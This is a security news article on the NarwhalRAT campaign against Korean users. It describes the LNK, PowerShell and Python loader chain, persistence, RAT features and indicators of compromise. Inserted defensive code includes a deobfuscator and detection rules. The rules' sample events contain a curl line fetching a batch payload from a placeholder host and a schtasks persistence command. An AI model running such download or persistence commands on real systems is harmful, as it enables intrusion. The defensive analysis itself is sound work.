
Hackers Abuse LNK Files, PowerShell, and Python Loader to Deploy NarwhalRAT

Source: Cybersecurity News (archived Jun 15, 2026)




By Tushar Subhra Dutta, June 15, 2026

A sophisticated malware campaign is quietly targeting Korean users through a well-crafted chain of deception. Threat actors are using innocent-looking shortcut files, built-in Windows tools, and a compiled Python payload to plant a remote access trojan called NarwhalRAT on victim machines. The attack stands out for how cleverly it blends into normal system activity, making it hard to catch.

The infection begins with a spear-phishing email pretending to be an urgent security alert from the “Microsoft Account Team.” The message warns the recipient about suspicious one-time password activity and directs them to open an attached advisory document. In reality, the attachment is a ZIP archive hiding a malicious LNK shortcut file, not a real document.

Analysts at Genians Security Center said in a report shared with Cyber Security News (CSN) that this threat bears strong similarities to a Python-based backdoor campaign documented in May 2026. Researchers named the malware NarwhalRAT after the string “naverwhale” found inside its code, believed to be an attempt to masquerade as Naver Whale, a popular browser in South Korea.

The malware primarily targets Korean users, and its behavioral structure confirms this. NarwhalRAT uses “naverwhale” as its working directory name and assigns the Hidden and System file attributes to the created folder to stay out of plain sight. It also handles KakaoTalk-related window identifiers separately during data collection, strongly pointing to Korean targeting.

The threat actor operated a dual command-and-control structure using a Korean relay server alongside the pCloud API as a Dead-drop Resolver. This lets the attacker change the actual C2 address without touching the malware, and helps traffic blend with normal web activity, making detection harder.
NarwhalRAT Loader Attack

When a victim clicks the malicious LNK file, a layered infection chain immediately begins. The LNK file uses CMD environment-variable substring substitution to hide the real commands, dynamically rebuilding strings such as “powershell” and “curl.exe” at runtime to evade static detection.

After deobfuscation, the LNK file launches PowerShell with the execution policy bypassed and uses a copied curl.exe to download two files from the relay server. The first is a decoy HWP document, opened to keep the victim unsuspecting; the second is a batch script named KHjWFcuS.bat that performs the next-stage installation in a hidden window. This abuse of built-in tools is classified as Living-off-the-Land.

The batch file downloads the official Python embedded package so that the activity looks like a normal software installation. It renames pythonw.exe to usersscreen.exe to suppress any console window. The final payload, config.cat, carries a .cat extension to resemble a Windows security catalog, but it is actually compiled Python bytecode acting as a backdoor loader.

Figure: Decrypted Batch File Commands (Source – Genians)

For persistence, the malware registers a scheduled task named “MicrosoftUserInterfacePicturesUpdateTackMachine” that runs at one-minute intervals. The name mimics a legitimate Microsoft task, making it hard for administrators to spot during inspection. A subsequent file, AccountConfig.cat, contains over 33,000 lines of obfuscated code with an embedded Base64-encoded payload.

NarwhalRAT Capabilities and C2 Communication

Once the payload executes in memory through fileless execution, NarwhalRAT reveals itself as a fully featured Remote Access Trojan. It first checks for virtual machine environments, including VMware, VirtualBox, and Parallels Desktop, to avoid sandbox analysis, a tactic typical of APT-level malware.
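The CMD environment-variable substring substitution used by the LNK file (described in the loader section above) is easiest to understand by reproducing cmd.exe's %VAR:~start,len% slicing rules and expanding a shortcut's arguments against a known environment. The following is an added analyst-side example, not code from the article or from Genians; the environment values and the obfuscated argument string are constructed to illustrate the technique, and the field names are this example's own. It also counts how many substring expressions an argument string contains, since legitimate shortcuts almost never use any, which makes the count itself a useful triage signal.

```python
import re
from typing import Dict, Optional

# cmd.exe substring expansion: %VAR:~start% or %VAR:~start,len%
SUBSTR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_()]*):~(-?\d+)(?:,(-?\d+))?%")


def cmd_substring(value: str, start: int, length: Optional[int]) -> str:
    """Reproduce cmd.exe's %VAR:~start,len% semantics on an expanded value.
    A negative start counts from the end; a negative len drops that many
    trailing characters; a missing len means 'to the end of the string'."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    start = min(start, n)
    if length is None:
        end = n
    elif length < 0:
        end = max(n + length, start)
    else:
        end = min(start + length, n)
    return value[start:end]


def deobfuscate(command: str, env: Dict[str, str]) -> str:
    """Expand every substring expression against a known environment.
    Variable names are case-insensitive, as in cmd.exe; unknown variables
    are left untouched so the analyst can see what is still unresolved."""
    env_upper = {k.upper(): v for k, v in env.items()}

    def expand(m: "re.Match[str]") -> str:
        value = env_upper.get(m.group(1).upper())
        if value is None:
            return m.group(0)
        length = int(m.group(3)) if m.group(3) is not None else None
        return cmd_substring(value, int(m.group(2)), length)

    return SUBSTR_RE.sub(expand, command)


def substitution_count(command: str) -> int:
    """Number of substring expressions in the argument string."""
    return len(SUBSTR_RE.findall(command))


# Constructed environment with typical default values (an assumption, not taken from the sample).
SAMPLE_ENV = {
    "COMSPEC": "C:\\Windows\\system32\\cmd.exe",
    "PUBLIC": "C:\\Users\\Public",
    "APPDATA": "C:\\Users\\Public\\AppData\\Roaming",
    "PSMODULEPATH": "C:\\Program Files\\WindowsPowerShell\\Modules",
}

# Constructed argument string in the style the article describes: each letter
# is sliced out of an environment variable, so no tool name appears literally.
SAMPLE_ARGS = (
    "%APPDATA:~17,1%%PSMODULEPATH:~25,9% -c "
    "%COMSPEC:~-7,1%%PUBLIC:~10,1%%PUBLIC:~6,1%%PUBLIC:~12,1%%COMSPEC:~23,4%"
)

if __name__ == "__main__":
    print("substitutions:", substitution_count(SAMPLE_ARGS))
    print("expanded     :", deobfuscate(SAMPLE_ARGS, SAMPLE_ENV))
```

Because cmd.exe resolves commands case-insensitively, the expanded text may come out with mixed case (here "powerShell -c curl.exe"); compare it case-insensitively when matching against tool names. Expanding with the victim's real environment matters: the attacker relies on default values of variables such as COMSPEC and PUBLIC, so a sandbox with unusual paths can produce a different, non-working command and hide the true behaviour.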
The RAT operates a command system built on more than 30 prefixes, giving the attacker remote control over screen capture, keylogging, microphone recording, file upload and download, USB collection, remote command execution, and C2 configuration changes. Keystroke data is stored temporarily before being transmitted in batches, reducing the chance of real-time detection.

Figure: Prefix-Based Command Control System (Source – Genians)

From a C2 perspective, NarwhalRAT connects to Korean relay sites including daehoat[.]com and novel21[.]co[.]kr, while also using pCloud as a Dead-drop Resolver secondary channel.

Researchers noted that EDR policies need to be strengthened to detect chained abuse based on LNK and PowerShell. Security teams should apply behavioral rules flagging unusual scheduled task creation, unexpected curl.exe usage, and Python processes running without a visible console window.

Indicators of Compromise (IoCs):

| Type | Indicator | Description |
|---|---|---|
| Domain | daehoat[.]com | Primary C2 Korean relay server |
| Domain | novel21[.]co[.]kr | Primary C2 Korean relay server |
| Domain | fe01[.]co[.]kr | Initial ZIP file download relay |
| Domain | webhostingkorea[.]com | Secondary relay used in LNK and BAT download stages |
| File Name | Cybersecurity Advisory Notice (Regarding One-Time Password Abuse).lnk | Malicious LNK file inside the phishing ZIP |
| File Name | Cybersecurity Advisory Notice (Regarding One-Time Password Abuse).zip | Phishing ZIP archive attachment |
| File Name | KHjWFcuS.bat | Second-stage batch file delivering the Python loader |
| File Name | config.cat | Python bytecode backdoor loader disguised as a Windows catalog file |
| File Name | AccountConfig.cat | Subsequent large Python payload with obfuscated RAT code |
| File Name | usersscreen.exe | Renamed pythonw.exe used to silently execute the payload |
| Scheduled Task | MicrosoftUserInterfacePicturesUpdateTackMachine | Persistence scheduled task running at one-minute intervals |
| File Path | C:\Users\Public\AccountPictures\UserInerfacePicture\ | Directory where payload files are deployed |
| File Path | C:\ProgramData\GoogleDriveUpdateCheck\ | Directory where AccountConfig.cat is stored |

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
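The three behavioral rules the researchers recommend (unusual scheduled task creation, unexpected curl.exe usage, and a Python interpreter running without a console window) can be expressed directly over process-creation telemetry. Below is an added example, not code from the article, Genians, or any EDR product: it runs the three rules over constructed Sysmon-style events whose field names (Image, OriginalFileName, ParentImage, CommandLine) are assumed. File names and directories follow the IoC table above; the schtasks arguments and the download URL are assumptions. The renamed-interpreter check relies on the PE version resource's OriginalFileName, which survives renaming pythonw.exe on disk.

```python
import ntpath
import re
from typing import Callable, Dict, List, Tuple

# One process-creation event, shaped like Sysmon Event ID 1 fields (assumed field names).
Event = Dict[str, str]

SYSTEM32 = "c:\\windows\\system32\\"
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
EVERY_MINUTE = re.compile(r"/sc\s+minute\s+/mo\s+1(?!\d)")


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def renamed_pythonw(ev: Event) -> bool:
    """Python's windowless interpreter running under another file name."""
    return (ev.get("OriginalFileName", "").lower() == "pythonw.exe"
            and _name(ev["Image"]) != "pythonw.exe")


def unexpected_curl(ev: Event) -> bool:
    """curl.exe executed from a copy outside System32, or spawned by a script host."""
    if _name(ev["Image"]) != "curl.exe":
        return False
    copied = not ev["Image"].lower().startswith(SYSTEM32)
    scripted = _name(ev.get("ParentImage", "")) in SCRIPT_HOSTS
    return copied or scripted


def rapid_scheduled_task(ev: Event) -> bool:
    """schtasks.exe creating a task that fires every minute."""
    cmdline = ev.get("CommandLine", "").lower()
    return (_name(ev["Image"]) == "schtasks.exe"
            and "/create" in cmdline
            and EVERY_MINUTE.search(cmdline) is not None)


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("renamed_pythonw", renamed_pythonw),
    ("unexpected_curl", unexpected_curl),
    ("rapid_scheduled_task", rapid_scheduled_task),
]


def triage(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule name, image path) for every event that trips a rule."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        for rule_name, rule in RULES:
            if rule(ev):
                hits.append((rule_name, ev["Image"]))
    return hits


# Constructed sample events: paths and names follow the article's IoCs,
# the schtasks arguments and the download URL are assumptions.
STAGE_DIR = "C:\\Users\\Public\\AccountPictures\\UserInerfacePicture\\"
SAMPLE_EVENTS: List[Event] = [
    {   # benign: system curl.exe run interactively
        "Image": "C:\\Windows\\System32\\curl.exe",
        "OriginalFileName": "curl.exe",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": "curl.exe --version",
    },
    {   # copied curl.exe spawned by PowerShell from the staging directory
        "Image": STAGE_DIR + "curl.exe",
        "OriginalFileName": "curl.exe",
        "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "curl.exe -o KHjWFcuS.bat hxxp://relay-placeholder.invalid/KHjWFcuS.bat",
    },
    {   # persistence task firing every minute
        "Image": "C:\\Windows\\System32\\schtasks.exe",
        "OriginalFileName": "schtasks.exe",
        "ParentImage": "C:\\Windows\\System32\\cmd.exe",
        "CommandLine": ("schtasks.exe /create /f /sc minute /mo 1 "
                        "/tn MicrosoftUserInterfacePicturesUpdateTackMachine "
                        "/tr \"" + STAGE_DIR + "usersscreen.exe config.cat\""),
    },
    {   # renamed pythonw.exe launched by the task, no console window
        "Image": STAGE_DIR + "usersscreen.exe",
        "OriginalFileName": "pythonw.exe",
        "ParentImage": "C:\\Windows\\System32\\svchost.exe",
        "CommandLine": "usersscreen.exe config.cat",
    },
    {   # benign: pythonw.exe under its real name
        "Image": "C:\\Python312\\pythonw.exe",
        "OriginalFileName": "pythonw.exe",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": "pythonw.exe script.pyw",
    },
]

if __name__ == "__main__":
    for rule_name, image in triage(SAMPLE_EVENTS):
        print(f"{rule_name:22s} {image}")
```

Each rule is independent, so the two benign events (a stock curl.exe started from Explorer and a properly named pythonw.exe) produce no hits, while the copied curl.exe, the one-minute task, and the renamed interpreter each trip exactly one rule. In production the same logic maps onto EDR or SIEM queries; the OriginalFileName comparison is the piece most worth keeping, because it catches a renamed pythonw.exe regardless of the name the attacker chooses.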